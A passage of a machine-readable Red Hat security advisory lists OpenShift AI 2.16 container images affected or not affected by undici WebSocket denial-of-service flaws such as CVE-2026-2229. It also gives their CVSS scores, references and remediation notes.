"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-training-operator-rhel8@sha256:6617c8beeb481dd39ae877b08361a377bc946fdf97787445bbec5bb3a0a0be1c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel8@sha256:297d22ca72b764328f7d0b85f7f7c013c91ca85d70f08be45a6689c85da6b311_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-rhel8@sha256:92571ea118c1b28b480cd40c1006e8d057e959cd2fd8e01f300926ccadd46fc7_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "undici: undici: Denial of Service via crafted WebSocket frame with large length"
},
{
"cve": "CVE-2026-2229",
"cwe": {
"id": "CWE-248",
"name": "Uncaught Exception"
},
"discovery_date": "2026-03-12T21:01:29.187989+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-codeflare-operator-rhel8@sha256:b68b73951beeabe942be43f65e778ff98e1cdfc6fdb4b052794f0cd4b191b819_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel8@sha256:fd02f0f70e38c947cdc307be3d9660f87262d92c5a361fa1bf68f24a72c91476_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel8@sha256:4e77720ec7972239d2b5198afc01ebd5dd777a1f75c2d19dbfeeb44f7adf729c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel8@sha256:64b60a2fcfb9806422127db0a7c42f665fa41f47cbe8fe2b98c6bc20b6a1bf28_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel8@sha256:b26f5118ae8e7e25783233698fe0d5df1e56cde8d75f745204d9f78c4d838412_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel8@sha256:9855fe0311c11b91fa38d205a65c0ad41b9447267408b3e7eb8f9b4c1d727acf_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kueue-controller-rhel8@sha256:f38932929d45522b0cfd9e2dd87682a3495688aad859b3a8dac51398860e0e95_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel8@sha256:c46e2392d44830fc612d1dc41ed953352dadcef696bc50a848d2cc5de694e1ca_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel8@sha256:0a30729330611926e635ec292bac2f5b7ce9f677aaff7f84b23549b2bbbd506d_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel8@sha256:b82bbdac9d911544af8bc55ce7e688610be23cf6c31676af30fea76e3613d125_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel8@sha256:9cfe909d46447d1dad8fd6a2319873d43b680b260d31f009eb086e22ad706f16_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel8@sha256:87129d071d526f8e4fe597f23ea169bf3920e0d52b7a7698e8c5685ef84b8f4a_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel8@sha256:07d85d51bfd8caddf447d7ea8c9b0c30879c03d8c3b9110cb86fc54e63ff0b48_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel8@sha256:ace145ce198785d2b587c4206d915f3c0e0ebe0b051cdd16ccc82cbc74e11352_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-controller-rhel8@sha256:a880b9fd06cd7206e3397025371ba3a3655798be5d64bed620f3847ff6a0b5ac_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-operator-rhel8@sha256:8b7e95c316a28938a37b885d3e5c0503728add4b75066f3953430e5385dcacf5_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-rhel8@sha256:14245353d924e3416f1b637ba1fec18a3218d9402965ff0acdfd2497e294f9ae_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-rhel8@sha256:abdb41f0a3c3f60094b48b2b69545968292446e3a609c42fdb51f27b4ef7ae81_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel8@sha256:a291cd5f04c559fd16477ae2ad364a350c4bf0c5a3f5aa2e614260fd4a5bece2_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel8@sha256:ae2514c29fedec9401a594ca3fe5e7ca132d23f2f2a1966b5f6cc7bb8b99d75b_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-notebook-controller-rhel8@sha256:aa551353c01d864361785cded067ec32e5bb3e478964aa540749b6a23f93b4db_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-operator-bundle@sha256:9407349c0fbf8d8be227d61d21e4ca9cc2d640c18ca040dfd94c33f0b1250f29_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-rhel8-operator@sha256:2e62a8a86b30347004012213f9af230d957cbb3f96771aa68490be6a3e22d949_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-training-operator-rhel8@sha256:6617c8beeb481dd39ae877b08361a377bc946fdf97787445bbec5bb3a0a0be1c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel8@sha256:297d22ca72b764328f7d0b85f7f7c013c91ca85d70f08be45a6689c85da6b311_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-rhel8@sha256:92571ea118c1b28b480cd40c1006e8d057e959cd2fd8e01f300926ccadd46fc7_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2447143"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the undici WebSocket client. A remote malicious server can exploit this vulnerability by sending a WebSocket frame with an invalid `server_max_window_bits` parameter within the permessage-deflate extension. This improper validation causes the client\u0027s Node.js process to terminate, leading to a denial-of-service (DoS) condition for the client.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "undici: Undici: Denial of Service via invalid WebSocket permessage-deflate extension parameter",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-dashboard-rhel8@sha256:022c21f044dead0ff28bfc5fb5fb2fd51f3ed8e1a6cfc90bd18222abf0388018_amd64"
],
"known_not_affected": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-codeflare-operator-rhel8@sha256:b68b73951beeabe942be43f65e778ff98e1cdfc6fdb4b052794f0cd4b191b819_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel8@sha256:fd02f0f70e38c947cdc307be3d9660f87262d92c5a361fa1bf68f24a72c91476_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel8@sha256:4e77720ec7972239d2b5198afc01ebd5dd777a1f75c2d19dbfeeb44f7adf729c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel8@sha256:64b60a2fcfb9806422127db0a7c42f665fa41f47cbe8fe2b98c6bc20b6a1bf28_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel8@sha256:b26f5118ae8e7e25783233698fe0d5df1e56cde8d75f745204d9f78c4d838412_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel8@sha256:9855fe0311c11b91fa38d205a65c0ad41b9447267408b3e7eb8f9b4c1d727acf_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kueue-controller-rhel8@sha256:f38932929d45522b0cfd9e2dd87682a3495688aad859b3a8dac51398860e0e95_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel8@sha256:c46e2392d44830fc612d1dc41ed953352dadcef696bc50a848d2cc5de694e1ca_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel8@sha256:0a30729330611926e635ec292bac2f5b7ce9f677aaff7f84b23549b2bbbd506d_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel8@sha256:b82bbdac9d911544af8bc55ce7e688610be23cf6c31676af30fea76e3613d125_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel8@sha256:9cfe909d46447d1dad8fd6a2319873d43b680b260d31f009eb086e22ad706f16_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel8@sha256:87129d071d526f8e4fe597f23ea169bf3920e0d52b7a7698e8c5685ef84b8f4a_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel8@sha256:07d85d51bfd8caddf447d7ea8c9b0c30879c03d8c3b9110cb86fc54e63ff0b48_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel8@sha256:ace145ce198785d2b587c4206d915f3c0e0ebe0b051cdd16ccc82cbc74e11352_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-controller-rhel8@sha256:a880b9fd06cd7206e3397025371ba3a3655798be5d64bed620f3847ff6a0b5ac_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-operator-rhel8@sha256:8b7e95c316a28938a37b885d3e5c0503728add4b75066f3953430e5385dcacf5_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-rhel8@sha256:14245353d924e3416f1b637ba1fec18a3218d9402965ff0acdfd2497e294f9ae_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-rhel8@sha256:abdb41f0a3c3f60094b48b2b69545968292446e3a609c42fdb51f27b4ef7ae81_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel8@sha256:a291cd5f04c559fd16477ae2ad364a350c4bf0c5a3f5aa2e614260fd4a5bece2_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel8@sha256:ae2514c29fedec9401a594ca3fe5e7ca132d23f2f2a1966b5f6cc7bb8b99d75b_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-notebook-controller-rhel8@sha256:aa551353c01d864361785cded067ec32e5bb3e478964aa540749b6a23f93b4db_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-operator-bundle@sha256:9407349c0fbf8d8be227d61d21e4ca9cc2d640c18ca040dfd94c33f0b1250f29_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-rhel8-operator@sha256:2e62a8a86b30347004012213f9af230d957cbb3f96771aa68490be6a3e22d949_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-training-operator-rhel8@sha256:6617c8beeb481dd39ae877b08361a377bc946fdf97787445bbec5bb3a0a0be1c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel8@sha256:297d22ca72b764328f7d0b85f7f7c013c91ca85d70f08be45a6689c85da6b311_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-rhel8@sha256:92571ea118c1b28b480cd40c1006e8d057e959cd2fd8e01f300926ccadd46fc7_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-2229"
},
{
"category": "external",
"summary": "RHBZ#2447143",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2447143"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-2229",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-2229"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-2229",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2229"
},
{
"category": "external",
"summary": "https://cna.openjsf.org/security-advisories.html",
"url": "https://cna.openjsf.org/security-advisories.html"
},
{
"category": "external",
"summary": "https://datatracker.ietf.org/doc/html/rfc7692",
"url": "https://datatracker.ietf.org/doc/html/rfc7692"
},
{
"category": "external",
"summary": "https://github.com/nodejs/undici/security/advisories/GHSA-v9p9-hfj2-hcw8",
"url": "https://github.com/nodejs/undici/security/advisories/GHSA-v9p9-hfj2-hcw8"
},
{
"category": "external",
"summary": "https://hackerone.com/reports/3487486",
"url": "https://hackerone.com/reports/3487486"
},
{
"category": "external",
"summary": "https://nodejs.org/api/zlib.html#class-zlibinflateraw",
"url": "https://nodejs.org/api/zlib.html#class-zlibinflateraw"
}
],
"release_date": "2026-03-12T20:27:05.600000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-25T12:32:51+00:00",
"details": "For Red Hat OpenShift AI 2.16.4 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.redhat.com/en/documentation/red_hat_openshift_ai/",
"product_ids": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-dashboard-rhel8@sha256:022c21f044dead0ff28bfc5fb5fb2fd51f3ed8e1a6cfc90bd18222abf0388018_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5807"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-codeflare-operator-rhel8@sha256:b68b73951beeabe942be43f65e778ff98e1cdfc6fdb4b052794f0cd4b191b819_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-dashboard-rhel8@sha256:022c21f044dead0ff28bfc5fb5fb2fd51f3ed8e1a6cfc90bd18222abf0388018_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel8@sha256:fd02f0f70e38c947cdc307be3d9660f87262d92c5a361fa1bf68f24a72c91476_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel8@sha256:4e77720ec7972239d2b5198afc01ebd5dd777a1f75c2d19dbfeeb44f7adf729c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel8@sha256:64b60a2fcfb9806422127db0a7c42f665fa41f47cbe8fe2b98c6bc20b6a1bf28_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel8@sha256:b26f5118ae8e7e25783233698fe0d5df1e56cde8d75f745204d9f78c4d838412_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel8@sha256:9855fe0311c11b91fa38d205a65c0ad41b9447267408b3e7eb8f9b4c1d727acf_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kueue-controller-rhel8@sha256:f38932929d45522b0cfd9e2dd87682a3495688aad859b3a8dac51398860e0e95_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel8@sha256:c46e2392d44830fc612d1dc41ed953352dadcef696bc50a848d2cc5de694e1ca_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel8@sha256:0a30729330611926e635ec292bac2f5b7ce9f677aaff7f84b23549b2bbbd506d_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel8@sha256:b82bbdac9d911544af8bc55ce7e688610be23cf6c31676af30fea76e3613d125_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel8@sha256:9cfe909d46447d1dad8fd6a2319873d43b680b260d31f009eb086e22ad706f16_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel8@sha256:87129d071d526f8e4fe597f23ea169bf3920e0d52b7a7698e8c5685ef84b8f4a_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel8@sha256:07d85d51bfd8caddf447d7ea8c9b0c30879c03d8c3b9110cb86fc54e63ff0b48_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel8@sha256:ace145ce198785d2b587c4206d915f3c0e0ebe0b051cdd16ccc82cbc74e11352_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-controller-rhel8@sha256:a880b9fd06cd7206e3397025371ba3a3655798be5d64bed620f3847ff6a0b5ac_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-operator-rhel8@sha256:8b7e95c316a28938a37b885d3e5c0503728add4b75066f3953430e5385dcacf5_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-rhel8@sha256:14245353d924e3416f1b637ba1fec18a3218d9402965ff0acdfd2497e294f9ae_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-rhel8@sha256:abdb41f0a3c3f60094b48b2b69545968292446e3a609c42fdb51f27b4ef7ae81_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel8@sha256:a291cd5f04c559fd16477ae2ad364a350c4bf0c5a3f5aa2e614260fd4a5bece2_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel8@sha256:ae2514c29fedec9401a594ca3fe5e7ca132d23f2f2a1966b5f6cc7bb8b99d75b_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-notebook-controller-rhel8@sha256:aa551353c01d864361785cded067ec32e5bb3e478964aa540749b6a23f93b4db_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-operator-bundle@sha256:9407349c0fbf8d8be227d61d21e4ca9cc2d640c18ca040dfd94c33f0b1250f29_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-rhel8-operator@sha256:2e62a8a86b30347004012213f9af230d957cbb3f96771aa68490be6a3e22d949_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-training-operator-rhel8@sha256:6617c8beeb481dd39ae877b08361a377bc946fdf97787445bbec5bb3a0a0be1c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel8@sha256:297d22ca72b764328f7d0b85f7f7c013c91ca85d70f08be45a6689c85da6b311_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-rhel8@sha256:92571ea118c1b28b480cd40c1006e8d057e959cd2fd8e01f300926ccadd46fc7_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-codeflare-operator-rhel8@sha256:b68b73951beeabe942be43f65e778ff98e1cdfc6fdb4b052794f0cd4b191b819_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-dashboard-rhel8@sha256:022c21f044dead0ff28bfc5fb5fb2fd51f3ed8e1a6cfc90bd18222abf0388018_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel8@sha256:fd02f0f70e38c947cdc307be3d9660f87262d92c5a361fa1bf68f24a72c91476_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel8@sha256:4e77720ec7972239d2b5198afc01ebd5dd777a1f75c2d19dbfeeb44f7adf729c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel8@sha256:64b60a2fcfb9806422127db0a7c42f665fa41f47cbe8fe2b98c6bc20b6a1bf28_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel8@sha256:b26f5118ae8e7e25783233698fe0d5df1e56cde8d75f745204d9f78c4d838412_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel8@sha256:9855fe0311c11b91fa38d205a65c0ad41b9447267408b3e7eb8f9b4c1d727acf_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kueue-controller-rhel8@sha256:f38932929d45522b0cfd9e2dd87682a3495688aad859b3a8dac51398860e0e95_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel8@sha256:c46e2392d44830fc612d1dc41ed953352dadcef696bc50a848d2cc5de694e1ca_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel8@sha256:0a30729330611926e635ec292bac2f5b7ce9f677aaff7f84b23549b2bbbd506d_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel8@sha256:b82bbdac9d911544af8bc55ce7e688610be23cf6c31676af30fea76e3613d125_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel8@sha256:9cfe909d46447d1dad8fd6a2319873d43b680b260d31f009eb086e22ad706f16_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel8@sha256:87129d071d526f8e4fe597f23ea169bf3920e0d52b7a7698e8c5685ef84b8f4a_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel8@sha256:07d85d51bfd8caddf447d7ea8c9b0c30879c03d8c3b9110cb86fc54e63ff0b48_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel8@sha256:ace145ce198785d2b587c4206d915f3c0e0ebe0b051cdd16ccc82cbc74e11352_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-controller-rhel8@sha256:a880b9fd06cd7206e3397025371ba3a3655798be5d64bed620f3847ff6a0b5ac_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-operator-rhel8@sha256:8b7e95c316a28938a37b885d3e5c0503728add4b75066f3953430e5385dcacf5_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-rhel8@sha256:14245353d924e3416f1b637ba1fec18a3218d9402965ff0acdfd2497e294f9ae_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-rhel8@sha256:abdb41f0a3c3f60094b48b2b69545968292446e3a609c42fdb51f27b4ef7ae81_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel8@sha256:a291cd5f04c559fd16477ae2ad364a350c4bf0c5a3f5aa2e614260fd4a5bece2_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel8@sha256:ae2514c29fedec9401a594ca3fe5e7ca132d23f2f2a1966b5f6cc7bb8b99d75b_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-notebook-controller-rhel8@sha256:aa551353c01d864361785cded067ec32e5bb3e478964aa540749b6a23f93b4db_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-operator-bundle@sha256:9407349c0fbf8d8be227d61d21e4ca9cc2d640c18ca040dfd94c33f0b1250f29_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-rhel8-operator@sha256:2e62a8a86b30347004012213f9af230d957cbb3f96771aa68490be6a3e22d949_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-training-operator-rhel8@sha256:6617c8beeb481dd39ae877b08361a377bc946fdf97787445bbec5bb3a0a0be1c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel8@sha256:297d22ca72b764328f7d0b85f7f7c013c91ca85d70f08be45a6689c85da6b311_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-rhel8@sha256:92571ea118c1b28b480cd40c1006e8d057e959cd2fd8e01f300926ccadd46fc7_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "undici: Undici: Denial of Service via invalid WebSocket permessage-deflate extension parameter"
},
{
"cve": "CVE-2026-25223",
"cwe": {
"id": "CWE-179",
"name": "Incorrect Behavior Order: Early Validation"
},
"discovery_date": "2026-02-03T22:01:19.884891+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-codeflare-operator-rhel8@sha256:b68b73951beeabe942be43f65e778ff98e1cdfc6fdb4b052794f0cd4b191b819_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel8@sha256:fd02f0f70e38c947cdc307be3d9660f87262d92c5a361fa1bf68f24a72c91476_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel8@sha256:4e77720ec7972239d2b5198afc01ebd5dd777a1f75c2d19dbfeeb44f7adf729c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel8@sha256:64b60a2fcfb9806422127db0a7c42f665fa41f47cbe8fe2b98c6bc20b6a1bf28_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel8@sha256:b26f5118ae8e7e25783233698fe0d5df1e56cde8d75f745204d9f78c4d838412_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel8@sha256:9855fe0311c11b91fa38d205a65c0ad41b9447267408b3e7eb8f9b4c1d727acf_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kueue-controller-rhel8@sha256:f38932929d45522b0cfd9e2dd87682a3495688aad859b3a8dac51398860e0e95_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel8@sha256:c46e2392d44830fc612d1dc41ed953352dadcef696bc50a848d2cc5de694e1ca_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel8@sha256:0a30729330611926e635ec292bac2f5b7ce9f677aaff7f84b23549b2bbbd506d_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel8@sha256:b82bbdac9d911544af8bc55ce7e688610be23cf6c31676af30fea76e3613d125_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel8@sha256:9cfe909d46447d1dad8fd6a2319873d43b680b260d31f009eb086e22ad706f16_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel8@sha256:87129d071d526f8e4fe597f23ea169bf3920e0d52b7a7698e8c5685ef84b8f4a_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel8@sha256:07d85d51bfd8caddf447d7ea8c9b0c30879c03d8c3b9110cb86fc54e63ff0b48_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel8@sha256:ace145ce198785d2b587c4206d915f3c0e0ebe0b051cdd16ccc82cbc74e11352_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-controller-rhel8@sha256:a880b9fd06cd7206e3397025371ba3a3655798be5d64bed620f3847ff6a0b5ac_amd64",
